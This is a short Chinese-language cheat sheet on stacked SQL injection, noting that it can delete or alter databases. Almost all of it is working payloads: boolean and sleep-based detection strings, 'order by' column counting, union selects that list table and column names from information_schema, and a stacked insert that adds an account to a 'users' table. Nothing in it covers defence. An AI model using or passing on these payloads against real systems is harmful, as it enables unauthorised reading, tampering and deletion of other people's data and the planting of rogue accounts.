堆叠注入
堆叠注入就是可以同时执行多条语句,危害较大,利用此漏洞可以进行删库或者修改数据库信息
检测是否需存在sql注入
1' and 1=1 --
1' and 1=2 -- #查看页面是否返回一致
1' ;sleep(5) #检测是否存在堆叠注入
查询存在多少字段
1' order by 5 --
使用联合查询获取表名
-1' union select 1,2,(select group_concat(TABLE_NAME) from
information_schema.TABLES where TABLE_SCHEMA=database() limit 1) --
使用联合查询获取字段名称
-1' union select 1,2,(select group_concat(column_name) from
information_schema.columns where TABLE_NAME='users' limit 1)--+
使用堆叠注入添加账号密码
1' ;insert into users values(33,'heihei','tiantian') --+